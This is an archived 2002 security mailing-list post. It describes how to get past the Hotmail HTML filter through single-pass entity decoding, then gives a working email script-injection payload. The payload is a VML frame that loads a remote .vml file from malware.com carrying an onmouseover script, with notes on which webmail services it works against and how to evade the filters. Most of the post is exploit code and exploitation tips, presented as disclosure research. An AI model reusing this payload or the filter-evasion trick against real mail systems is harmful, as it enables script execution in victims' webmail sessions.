<!-- So what about Hotmail ? Well, where can we put unicode in an html message ? Into an url as %xx, yep, but that's not the point here. There is a thing called "html entities" : you can replace *any* printable character by its ascii/unicode value in the values of the parameters of html tags, for instance in the parameters of the STYLE tag (hint !). "A" is A, "B" is B, etc. >What the hotmail filter did is replacing any html entity by its corresponding character, then trying to filter out any bad string (forbidden keywords), THEN giving the output to the user, without re- applying the filter on this output. But, if there are still html entities into this output, the user's browser will interpret them, that will possibly give birth to some interesting forbidden keywords... and fire a script.--> Excellent. Here's another one for you FozZY: <HTML xmlns:v = "urn:schemas-microsoft-com:vml"> <STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE> <v:vmlframe style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px; HEIGHT: 200px" src = "http://www.malware.com/fooness.vml#malware"></v:vmlframe> where fooness.vml#malware is: <xml xmlns:v = "urn:schemas-microsoft-com:vml"> <v:rect id="malware" fillcolor="green" style="position:relative;top:1;left:1;width:20;height:20" onmouseover="alert('malware was here')"> </v:rect> </xml> 1. This works on Yahoo and Excite, probably others 2. Quick fiddling suggests only mouseover works 3. Hotmail only filters this: <HTML xmlns:v = "urn:schemas-microsoft-com:vml"> <STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE> which is absolutely required. Probably easier to mask than say "Javascript" note 1/: can't recall, Hotmail may not allow for retrieval of files remotely, or base64 encodes them on the Hotmail server if there are any. If so, you can embed and CID: the fooness.vml note /2: the above may also work in IE dependent mail clients (Eudora..?..) note /3: doesn't want to work in Outlook Express with scripting off even though the frame aspect works - which is patched in OE6 -- http://www.malware.com
This archive was generated by hypermail 2b30 : Wed Jul 17 2002 - 18:12:04 PDT